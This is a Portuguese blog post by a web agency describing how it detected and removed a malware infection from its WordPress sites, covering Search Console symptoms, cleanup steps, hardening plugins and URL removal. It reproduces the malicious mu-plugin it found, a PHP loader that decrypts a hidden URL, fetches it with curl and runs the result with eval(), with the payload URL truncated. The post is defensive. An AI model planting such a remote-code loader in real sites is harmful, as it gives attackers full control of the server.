MALWARE EM WORDPRESS COM ERRO DE INDEXAÇÃO NO GOOGLE

Home – NEGOCIO DIGITAL – MALWARE EM WORDPRESS COM ERRO DE INDEXAÇÃO NO GOOGLE

MALWARE EM WORDPRESS COM ERRO DE INDEXAÇÃO NO GOOGLE

No artigo de hoje, vamos compartilhar os passos que seguimos para identificar e corrigir um vírus (malware) em alguns de nossos sites WordPress. Recentemente, detectamos uma infecção que afetou vários sites, e vamos detalhar como descobrimos o problema, como o corrigimos e as medidas que tomamos para evitar futuras infecções.

CONSTATANDO O PROBLEMA NO GOOGLE SEARCH CONSOLE

No dia 03/01/2025, ao acessar o Google Search Console, percebemos um comportamento anômalo no site: houve uma indexação incomum. O número de páginas não indexadas subiu de 88 para 6.086 páginas não indexadas, o que acionou o alerta “Há algo errado”.

Ao analisar a lista de arquivos, verificamos na sessão “Detectada, mas não indexada no momento” que muitas páginas começaram a ser indexadas com sufixos como “…/comment.php?aaaaa/d2642456.html”. Como nosso site é WordPress, sabemos que não possuímos um arquivo comment.php, o que levantou suspeitas sobre uma possível infecção.

MALWARE EM WORDPRESS COM ERRO DE INDEXAÇÃO NO GOOGLE

Além disso, ao acessar a seção Usuários no Google Search Console, percebemos a presença de um usuário desconhecido com permissões de administrador. Fomos até as configurações para verificar e remover qualquer usuário não autorizado.

CONSTATANDO O PROBLEMA NO GOOGLE

Ao fazer uma busca no Google com o comando “site:www.seusite.com.br”, notamos uma quantidade gigantesca de páginas sendo exibidas. O que mais chamou atenção foi que as descrições dessas páginas estavam em um idioma diferente, possivelmente japonês ou chinês. Isso é um indicativo de que o conteúdo das páginas foi alterado por alguém com intenções maliciosas.

CONSTATANDO O PROBLEMA NO GOOGLE SEARCH CONSOLE

Embora o site estivesse com dificuldades para acessar algumas páginas, decidimos investigar um site que parecia funcionar corretamente. Durante a análise, descobrimos alguns sinais de infecção:

Google Site Kit: Se você tiver o plugin Google Site Kit instalado, ao acessar o painel, vai perceber que as conexões com os serviços do Google estão desconectadas. Ao tentar reconectar o site, ele redireciona para um site estranho.
Inspeção no Google Search Console: Ao inspecionar o site via Google Search Console (Botão Direito > Inspecionar), notamos que os erros de requisição estavam se acumulando rapidamente (10, 20, 40, 60…), indicando que algo estava fora de controle.
Plugins: Ao acessar a página de plugins, em alguns casos, o site estava redirecionando para sites estranhos.

MALWARE EM WORDPRESS COM ERRO DE INDEXAÇÃO NO GOOGLE

USANDO O PLUGIN MALCARE PARA DETECTAR A INFECÇÃO

Para confirmar a infecção, instalamos o plugin MalCare, que realiza uma varredura completa no site. Após a instalação e execução do MalCare, ele notificou que o site estava infectado. O plugin pode ajudar a detectar arquivos e comportamentos maliciosos e sugerir correções.

COMO REMOVER O VÍRUS DO SITE: PASSO A PASSO

Após a detecção do vírus, tomamos várias ações para limpar o site e restaurá-lo à sua condição original. Aqui estão os principais passos que seguimos:

Alterando o Arquivo .htaccess: Via FTP, acessamos o arquivo .htaccess na raiz do servidor. Se o arquivo estava oculto, fizemos as configurações para exibir arquivos ocultos. Após localizar o arquivo, substituímos o conteúdo por um htaccess padrão do WordPress:

				
					# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

Removemos também qualquer arquivo .htaccess extra encontrado em diretórios como wp-admin e wp-content, pois esses arquivos eram criados pelo vírus.

Exclusão de Arquivos Maliciosos: O vírus criou alguns arquivos, como comment.php e item.php, que estavam gerando os erros e redirecionamentos. Esses arquivos foram removidos manualmente.
Remoção do Código Malicioso: Após realizar uma verificação manual via FTP, encontramos um arquivo PHP malicioso no diretório wp-content/mu-plugins. O arquivo test-mu-plugin.php estava configurado com código de criptografia e redirecionamento malicioso.
O código malicioso usava AES para criptografar URLs e redirecionar o site para páginas externas. Removemos esse arquivo e outros códigos associados.

MALWARE EM WORDPRESS COM ERRO DE INDEXAÇÃO NO GOOGLE

				
					<?php
define("ENCRYPTION_KEY", "your-secret-key");
$encrypted_url = "l2U........e o resto do código criptografado";
function decrypt_url($encrypted_url, $key) {
    return openssl_decrypt(
        $encrypted_url,
        'AES-128-CBC',
        substr(hash('sha256', $key, true), 0, 16),
        0,
        substr(hash('md5', $key, true), 0, 16)
    );
}
$url = decrypt_url($encrypted_url, ENCRYPTION_KEY);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); 
$output = curl_exec($ch);
curl_close($ch);

if ($output !== false) {
    echo eval($output); 
} else {
    echo "Failed to fetch content from the URL.";
}
?>

O que esse código faz:
- Criptografia de URLs: O código criptografa uma URL com a chave ENCRYPTION_KEY. Isso é feito para ocultar a URL de redirecionamento e dificultar a identificação imediata.
- Redirecionamento via curl: Após descriptografar a URL, o código utiliza curl para acessar a URL maliciosa e executar o conteúdo retornado.
- Execução de código remoto via eval(): O código eval($output) executa o código malicioso retornado pela URL. Este é um risco grave, pois permite a execução de qualquer código PHP externo no servidor.
Por que remover esse código:
Este código malicioso é uma ameaça séria para a segurança do site, pois permite que código remoto seja executado no servidor, o que pode levar a comprometimento completo do site, roubo de dados ou inserção de malware adicional. Remover esse arquivo e o código contido nele é essencial para a restauração da segurança do site.

- Verificação de Plugins e Temas:
  - Desinstalamos e reinstalamos o tema e plugins do site para garantir que não houvesse arquivos maliciosos remanescentes.
  - Plugins não utilizados foram removidos, e todos os plugins foram atualizados para suas versões mais recentes.
- Limpeza do Banco de Dados: Realizamos uma varredura no banco de dados, mas não identificamos modificações maliciosas no MySQL, embora a infecção estivesse em arquivos PHP.
- Alteração de Senhas e Usuários: Alteramos as senhas de administrador e removemos usuários desconhecidos do painel de administração do WordPress.

PROCEDIMENTO DE SEGURANÇA PARA EVITAR NOVAS INFECÇÕES

Após limpar o site, implementamos várias medidas de segurança para evitar futuras infecções:

Limitar Tentativas de Login: Instalamos e configuramos o plugin Limit Login Attempts Reloaded.
MalCare: Continuamos utilizando o plugin MalCare para monitoramento contínuo.
Wordfence: Instalamos o plugin Wordfence para proteger o site contra ataques.
Senha Forte: Alteramos a senha de acesso do site para uma senha mais forte e segura.

CONFIRMANDO QUE O SITE ESTÁ LIMPO

Após completar os procedimentos de limpeza, seguimos esses passos para garantir que o site estava livre de vírus:

Limpeza de Cache: Limpeza do cache do site.
Reverificação com o MalCare: Reexecutamos a verificação com o plugin MalCare.
Reinstalação do Google Site Kit: Instalamos novamente o Google Site Kit e reconectamos com os serviços do Google.

DESINDEXAR PÁGINAS NO GOOGLE SEARCH CONSOLE:

Se o seu site foi limpo, o próximo passo é informar ao Google que o problema foi resolvido. Para isso, siga os passos abaixo:

Acesse a conta do seu site no Google Search Console e analise as páginas indexadas incorretamente.
Vá para: Páginas > Detectada, mas não indexada no momento.
Nessa seção, será listada a páginas que não foram indexadas corretamente. Aqui estão alguns exemplos que encontramos:
- https://seusite.com.br/comment.php?aaaaa/d2642456.html
- https://seusite.com.br/item.php?zyblsq/u7423067.html

Nos dois exemplos acima, podemos ver dois prefixos diferentes:

A partir desses dois prefixos, centenas, até milhares de páginas foram indexadas no Google. Vamos solicitar a remoção dessas páginas:

Com os dois links identificados, acesse a opção Remoções no Google Search Console, e clique em Nova solicitação (botão vermelho no canto superior da página).
Certifique-se de que você está na aba REMOVER URL TEMPORARIAMENTE. Insira a URL e escolha a opção REMOVER TODOS OS URLS COM ESTE PREFIXO. Clique em Próxima e depois em Enviar Solicitação.

Caso você identifique outras páginas indexadas incorretamente, que não estão nesses exemplos, também pode removê-las.

Em alguns dias, os sites devem ser limpos e a indexação voltará ao normal.

CONCLUSÃO

Após cinco dias de monitoramento, nossos sites voltaram ao normal, com o Google Search Console exibindo as descrições corretas e as páginas sendo indexadas adequadamente.

Se você enfrentar o mesmo problema em seus sites WordPress, siga esses passos para detectar, remover e proteger seu site contra vírus. Caso

os problemas persistam, continue monitorando e fazendo atualizações regulares no site.

A recuperação de sites infectados por malware pode ser um processo desafiador, mas com as práticas corretas e ferramentas adequadas, é possível restaurar o site e proteger contra futuros ataques. Prevenção é a chave: sempre mantenha seus plugins, temas e o próprio WordPress atualizados, faça backups regulares e implemente camadas de segurança, como o Wordfence e o MalCare, para garantir a proteção contínua do seu site.

Se você precisar de mais ajuda ou orientação sobre como proteger seu site WordPress contra ameaças, entre em contato com a Negócio Digital para obter assistência especializada.

Publicado por: Agostinho Filho: Negócio Digital – Otimização de Sites